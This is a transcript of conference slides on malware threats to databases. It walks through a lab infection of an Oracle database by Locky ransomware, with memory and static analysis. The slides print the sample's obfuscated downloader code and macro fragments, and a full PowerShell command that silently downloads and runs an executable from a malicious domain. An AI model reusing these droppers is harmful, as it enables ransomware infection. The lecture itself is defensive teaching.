Chronicles of Malwares and Detection Systems_SecurityXploded_Meet_june14
MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11...
Transcript of MALWARES ON WINDOWS AND LINUX: THE WORST THREAT … · INTRODUCTION HTTP://ALEXANDREBORGES.ORG 11...
AL
EX
AN
DR
E B
OR
GE
S –
IT
IS
NO
T A
LL
OW
ED
TO
CO
PY
NE
ITH
ER
RE
PR
OD
UC
E T
HIS
SL
IDE
.
1
GUOB TECH DAY 2017 – LA OTN TOUR
(INTRODUCTORY LECTURE FOR DBAs)
By Alexandre Borges
MALWARES ON WINDOWS AND LINUX: THE
WORST THREAT FOR DATABASES
PROFILE AND TOC
TOC:
• Introduction
• Infection
• Test Environment
• Memory Analysis
• Quick Dynamic and Static Analysis
• Last words
• Malware and Security Researcher.
• Consultant, Instructor and Speaker on Malware
Analysis, Memory Analysis, Digital Forensics,
Rootkits and Software Exploitation.
• Instructor at Oracle, (ISC)2 and EC-Council. Ex-
instructor at Symantec.
• Member of the CHFI Advisory Board in EC-Council.
• Reviewer member of the The Journal of Digital
Forensics, Security and Law.
• Refereer on Digital Investigation:The International
Journal of Digital Forensics & Incident Response
• Author of “Oracle Solaris Advanced Administration
book”
AL
EX
AN
DR
E B
OR
GE
S –
IT
IS
NO
T A
LL
OW
ED
TO
CO
PY
NE
ITH
ER
RE
PR
OD
UC
E T
HIS
SL
IDE
.
WARNING !!!
• Please, pay attention in the following considerations:
• It is NOT ALLOWED to take pictures of the slides.
• It is NOT ALLOWED to record the lecture.
• It is NOT ALLOWED to film the lecture.
• Please, respect the speaker and his material.
HTTP://ALEXANDREBORGES.ORG 3
AL
EX
AN
DR
E B
OR
GE
S –
IT
IS
NO
T A
LL
OW
ED
TO
CO
PY
NE
ITH
ER
RE
PR
OD
UC
E T
HIS
SL
IDE
.
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 4
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 5
• FACT: Malwares are destroying the digital world.
• Several types of malwares:
• Ring 3 (ransomwares included)
• Ring 0 (kernel and bootkits malwares)
• Ring -1 (VMM)
• Ring -2 (SMM)
• Ring -3 ? (Intel Management Engine)
• Number of malwares infecting BIOS / UEFI has been increasing.
• Malwares running on GPU
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 6
• Malwares have used several tricks for making the detection harder than the
usual:
• Process hiding (DKOM)
• Process Replacement (Hollowing)
• DLL hiding (by manipulating _LDR_DATA_TABLE_ENTRY)
• Services hiding + Service Hijacking
• Hidden Sockets
• Code Injection (multiple methods)
• Hooking (code, IAT, EAT)
• Binary hidden in the Registry
INTRODUCTION
flink
101
blink
flink
102
blink
flink
103
blink
flink
103
blink
flink
102
blink
flink
101
blink
DKOM (Direct Kernel
Object Manipulation) on
the processes list.
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 8
.....
push param3
push param2
push param1
call good_function
mov ebx, eax
....
push ebp
mov esp, ebp
...good things...
call bad_function
....
ret
push ebp
mov esp, ebp
...bad things...
ret
Basic Function Hooking
INTRODUCTION
• NtClose function (from ntdll.dll) being hooked:
0x7c90cfd0 b819000000 MOV EAX, 0x19
0x7c90cfd5 ba5000907c MOV EDX, 0x7c900050
0x7c90cfda ffd2 CALL EDX
0x7c90cfdc c20400 RET 0x4
0x7c90cfdf 90 NOP
0x7c90cfe0 b81a000000 MOV EAX, 0x1a
0x7c90cfe5 ba DB 0xba
0x7c90cfe6 0003 ADD [EBX], AL
HTTP://ALEXANDREBORGES.ORG 9
Hooking
INTRODUCTION
0x7c900050 b203 MOV DL, 0x3
0x7c900052 eb08 JMP 0x7c90005c
0x7c900054 b204 MOV DL, 0x4
0x7c900056 eb04 JMP 0x7c90005c
0x7c900058 b205 MOV DL, 0x5
0x7c90005a eb00 JMP 0x7c90005c
0x7c90005c 52 PUSH EDX
0x7c90005d e804000000 CALL 0x7c900066
0x7c900062 f20094005aff2269 ADD [EAX+EAX+0x6922ff5a], DL
0x7c90006a 6e OUTS DX, BYTE [ESI]
.....
HTTP://ALEXANDREBORGES.ORG 10
Hooking
Anti-disassembly
trick.
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 11
• And about Injection techniques? There are many methods:
• Remote DLL Injection it is easily detected because the DLL
must be on disk before being injected.
• PE Injection a PE file, which has its IAT configured for the
target process, is written and forced to be executed into the
addressing space of the target process.
• Reflective Injection it is similar to the previous one, but the
code (usually a DLL) manages its initialization.
• APC Injection a malicious code is executed by attaching to an
APC (Asynchronous Procedure Call) of the target thread.
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 12
• Other tricks:
• Hooking SSDT
• Hooking IDT
• Orphan Threads
• IRP Hooking
• Hiding kernel drivers
• Bypassing KCS (Kernel Code Signing)
• Callbacks
• Filtering Drivers
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 13
• The analysis can be difficult because there are several anti -analysis techniques:
• Anti-Debugging
• Anti-Disassembly
• Anti-VMware
• Packers (common and virtualized ones)
• Obfuscation
• .NET tricks
• Powershell + WMI
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 14
• There are many threats infecting firmwares, which are persistent and stealth.
• They can replace the OS boot loader, patch the kernel, and so on...
• Petya (MBR ransomware)
• Mebromi (BIOS rootkit)
• Gapz (BIOS parameter block modification)
• TDL4
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 15
https://www.symantec.com/content/dam/symantec/docs/reports/istr-21-2016-en.pdf
INTRODUCTION
HTTP://ALEXANDREBORGES.ORG 16
• http://privacy-pc.com/articles/ransomware-chronicle.html
INTRODUCTION - KASPERSKY OVERALL
STATISTICS FOR 2016
HTTP://ALEXANDREBORGES.ORG 17
https://kasperskycontenthub.com/securelist/files/2016/12/Kaspersky_Security_Bulletin_
2016_Statistics_ENG.pdf
AL
EX
AN
DR
E B
OR
GE
S –
IT
IS
NO
T A
LL
OW
ED
TO
CO
PY
NE
ITH
ER
RE
PR
OD
UC
E T
HIS
SL
IDE
.
INTRODUCTION - KASPERSKY OVERALL
STATISTICS FOR 2016
HTTP://ALEXANDREBORGES.ORG 18
https://kasperskycontenthub.com/securelist/files/2016/12/Kaspersky_Security_Bulletin_
2016_Statistics_ENG.pdf
AL
EX
AN
DR
E B
OR
GE
S –
IT
IS
NO
T A
LL
OW
ED
TO
CO
PY
NE
ITH
ER
RE
PR
OD
UC
E T
HIS
SL
IDE
.
INTRODUCTION - SYMANTEC INTERNET
SECURITY THREAT REPORT 2016
HTTP://ALEXANDREBORGES.ORG 19
https://www.symantec.com/content/dam/symantec/docs/reports/istr-21-2016-en.pdf
AL
EX
AN
DR
E B
OR
GE
S –
IT
IS
NO
T A
LL
OW
ED
TO
CO
PY
NE
ITH
ER
RE
PR
OD
UC
E T
HIS
SL
IDE
.
Huh? Are you sure
that Linux systems are
safe against malwares?
INFECTION
HTTP://ALEXANDREBORGES.ORG 20
INFECTION
HTTP://ALEXANDREBORGES.ORG 21
• Malwares have three main goals when they infect a system:
• Owning the system for using it in future attacks
• Stealing data
• Hijacking data (ransomwares)
• We know the main techniques for infection:
• USB
• Network sharing
• Exploiting vulnerabilities (remember WannaCry)
INFECTION
HTTP://ALEXANDREBORGES.ORG 22
Click to die
INFECTION
HTTP://ALEXANDREBORGES.ORG 23
Obfuscated code. However, it is trivial
to solve it.
INFECTION
HTTP://ALEXANDREBORGES.ORG 24
Obfuscated code. Again, it is trivial to solve it.
INFECTION
HTTP://ALEXANDREBORGES.ORG 25
• function nomusta(prototu){return prototu.replace(/AA/g,"");}
• var fuka = new
ActiveXObject(nomusta("MSXAAML2.XMLHTAATP")
• fuka.open(jacob[3-2],
""+malysh()+"://"+gerlk+'/'+greezno()+'?'+zemk, ghyt);
• XMLHttpRequest object
• Represents an XML request using HTTP.
• It has an open method that requests a synchronous or
asynchronous file download from a specific URL.
INFECTION
HTTP://ALEXANDREBORGES.ORG 26
• XMLHttpRequest object also has a send method,
which sends an HTTP request to the server and
receives a response.
• function zulum(pikue) {pikue.send( );}
• zulum(fuka);
• function hust(gulibator){eval(gulibator);}
• hust(gusar);
INFECTION
HTTP://ALEXANDREBORGES.ORG 27
Click to die
INFECTION
HTTP://ALEXANDREBORGES.ORG 28
Probably, the malware’s author wants to execute something bad on your system.
INFECTION
HTTP://ALEXANDREBORGES.ORG 29
Sub Document_Open( )
urgixbe = "gwefakqyrb"
If (odbumuwgi = 811) Then
If (osduzu = "icdyclaw") Then
….
hnevo = Shell(ibovuhl, unymk)
niwwyshomq = Empty
tnovgistoqme = "58732" & 18
sgukkezihh = "46106" & 81
...
Again, obfuscated code. Once more, It is very simple
to bypass it.
INFECTION
HTTP://ALEXANDREBORGES.ORG 30
"CMD.exe /C "PoWersHELl.exE -eXecUTionPOliCy bypAss -
nOprOfiLE -WIndowstYlE HIDDen (new-ObJECT
SYStem.nET.WeBcLIent).downLOAdFilE('http://unityiestgen.top/
search.php','%appdaTA%.ExE');start-prOceSS
'%AppDatA%.Exe'""
I have not shown the desobfuscation process because it is really simple.
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 31
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 32
WINDOWS 8
x64 Internet
WINDOWS 8
x64
Oracle Database
12.2 installed
Oracle Instant Client
12.2 installed
NAT
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 33
• LISTENER.ORA
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 34
• TNSNAMES.ORA
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 35
C:\instantclient_12_2> sqlplus system@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=win81.example.com)(Port=1521))(CONNECT_DATA=(SID=orcl)))
Enter password: Malware123!
Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
SQL> select instance_name from v$instance;
INSTANCE_NAME
------------------------------------------------
orcl
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 36
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 37
Infected with Locky (version JUL/30/2017)
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 38
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 39
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 40
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 41
Encrypted database
files. On Windows,
you are lucky because
it prevents two
processes to alter the
same file at same time.
On Linux...no luck
TEST ENVIRONMENT
HTTP://ALEXANDREBORGES.ORG 42
Photo from Twitter of my colleague Valerie Thomas (@hacktress09 )
After Oracle database being encrypted by the ransomware....
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 43
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 44
Probably, the ransomware is destroying snapshots
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 45
Running as administrator
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 46
DLLs that are responsible for
accessing the network/Internet ;)
32-bit code running on x64. Of course.
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 47
Class Identifier registry. Is COM present?
Interesting Registry entries.
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 48
Few URLs on the memory
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 49
Locky ransomware connecting to C2 (Command
and Control Server).
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 50
Russia...again?
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 51
VAD Short and RWE.
Code Injection,of course.
VAD == Virtual Address
Descriptor)
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 52
Three injected code saved on disk. Pay attention: three different hashes.
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 53
Interesting string
references and DLLs.
MEMORY ANALYSIS
HTTP://ALEXANDREBORGES.ORG 54
It is a hooking, but this
specific one is not
important right now
QUICK STATIC AND DYNAMIC
ANALYSIS
HTTP://ALEXANDREBORGES.ORG 55
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 56
It seems that our malware is the Locky
ransomware, isn’t it?
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 57
Take a look at
the entropy.
Boring to reverse
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 58
High entropy.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 59
Encrypted
Overlay
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 60
MFC (Microsoft Foundation Class) It is a collection of classes commonly
used in object oriented programming. Usually, MFC could be though as a wrapper for
windows API (similar a “proxy” role) that are written in C++.
No import
names
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 61
The IDAPro shows us
all function names
inside the MFC42.dll ,
but the reversing
analysis is very boring.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 62
There is not any
Crypto function.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 63
Classic unpacking process, loading DLLs one by one.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 64
These new segments are
coming from VirtualAlloc( )
calls. Eventually, it could be
the unpacked executable
that we are looking for.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 65
They are good signs Therefore, we can save this dump to disk.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 66
The Crypto
functions
have arisen!
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 67
At this point
your life changes
(desperately
looking for a
backup).
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 68
from CryptImportKey( )
from CryptCreateHash( )
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 69
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 70
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 71
CryptSetKeyParam(hOriginalKey, AB_IV, new_IV)
while(block = NextBlockEncoding())
{
hDuplicateKey = CryptDuplicateKey(hOriginalKey)
CryptEncrypt(hDuplicateKey, block)
CryptDestroyKey(hDuplicateKey)
}
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 72
Usual place to set up
the persistence.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 73
Looking for all file extensions to
encrypt their respective files and this
data reference is the list of all them!
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 74
Few extensions that are looked
by the ransomware and, among
them, .dbf (from Oracle
databases).
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 75
Connect to author’s
server using username
and password.
QUICK STATIC AND DYNAMIC ANALYSIS
HTTP://ALEXANDREBORGES.ORG 76
We could use
Wireshark, couldn’t we ?
REMEMBER
HTTP://ALEXANDREBORGES.ORG 77
We are always in CONTROL...
HTTP://ALEXANDREBORGES.ORG 78
THANK YOU FOR ATTENDING MY LECTURE!
LinkedIn: http://www.linkedin.com/in/aleborges
Twitter: @ale_sp_brazil
Blog: http://alexandreborges.org
E-mail: [email protected]
• Malware and Security Researcher.
• Consultant, Instructor and Speaker on Malware
Analysis, Memory Analysis, Digital Forensics,
Rootkits and Software Exploitation.
• Instructor at Oracle, (ISC)2 and EC-Council. Ex-
instructor at Symantec.
• Member of the CHFI Advisory Board in EC-Council.
• Reviewer member of the The Journal of Digital
Forensics, Security and Law
• Refereer on Digital Investigation:The International
Journal of Digital Forensics & Incident Response
• Author of “Oracle Solaris Advanced Administration
book”